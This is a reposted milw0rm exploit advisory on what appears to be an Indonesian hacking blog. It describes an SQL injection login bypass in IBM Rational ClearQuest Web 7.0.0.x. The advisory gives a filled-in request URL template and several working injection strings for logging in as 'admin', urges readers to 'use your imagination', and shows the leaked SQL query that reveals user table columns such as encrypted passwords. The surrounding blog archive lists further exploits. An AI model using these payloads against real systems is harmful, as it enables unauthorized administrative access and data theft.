+==============================================================+
+   IBM Rational ClearQuest Web Login Bypass (SQL Injection)   +
+==============================================================+
DISCOVERED BY:
==============
SecureState
  sasquatch - swhite@securestate.com
  rel1k - dkennedy@securestate.com
HOMEPAGE:
=========
www.securestate.com
AFFECTED AREA:
===============
The username field on the login page is where the application is susceptible to SQL injection...
SAMPLE URL:
===========
http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE
Log in as "admin":
==================
' OR login_name LIKE '%admin%'--
(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...
Confirmed against:
==================
version 7.0.0.1        Label BALTIC_PATCH.D0609.929
version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630
FULL SQL Statement is spit back in error message:
=================================================
SELECT
   master_users.master_dbid, master_users.login_name, master_users.encrypted_password,
   master_users.email, master_users.fullname, master_users.phone, master_users.misc_info,
   master_users.is_active, master_users.is_superuser, master_users.is_appbuilder,
   master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask
FROM
   master_users
WHERE
   login_name = 'INJECTION GOES HERE
# milw0rm.com [2007-08-14]
Sabtu, 20 Oktober 2007
Langganan:
Posting Komentar (Atom)
Arsip Blog
- 
        ▼ 
      
2007
(36)
- 
        ▼ 
      
Oktober
(19)
- Creative Files 1.2 (kommentare.php) Remote SQL In...
 - PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php)...
 - PHP-FUSION Arcade Module (cid) Remote SQL Injectio...
 - PHP-FUSION topliste Module (cid) Remote SQL Inject...
 - PostNuke pnFlashGames Module v1.5 REmote SQL Injec...
 - IntegralMOD
 - phpBB Openid 0.2.0 Remote File Include
 - Joomla com_wmtgallery Remote File Include
 - Joomla com_colorlab Remote File Include
 - KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit
 - WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remo...
 - ClassWeb <= 2.03 Remote File Include Vulnerabilities
 - Webavis Remote file inclusion (root)
 - Dagger-web engine(cal.func.php)Remote File Inclusion
 - EVA-Web 1.1
 - IBM Rational ClearQuest Web Login Bypass (SQL Inje...
 - webED 0.8999
 - WebDesktop 0.1
 - cara menggunakan exploit di site http://milw0rm.com
 
 
 - 
        ▼ 
      
Oktober
(19)
 
Mengenai Saya
- ..::cr4wl3r::..
 - In Your Mind, In Your Mind, Indonesia
 - Tidak gampang ngaku hacker!!!!
 
Tidak ada komentar:
Posting Komentar